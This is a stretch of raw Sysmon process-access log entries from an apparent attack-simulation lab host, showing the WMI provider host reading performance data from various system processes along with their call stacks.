21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD9-60CA-8300-00000000D101}3672C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151894Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151893Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-8000-00000000D101}3628C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151892Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151891Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0FD7-60CA-7E00-00000000D101}2840C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151890Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151889Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6300-00000000D101}3116C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151888Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151887Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F6F-60CA-6200-00000000D101}3968C:\Users\Public\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151886Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151885Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F67-60CA-3500-00000000D101}2568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151884Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151883Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-3100-00000000D101}2104C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151882Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151881Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151880Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.337{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151879Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 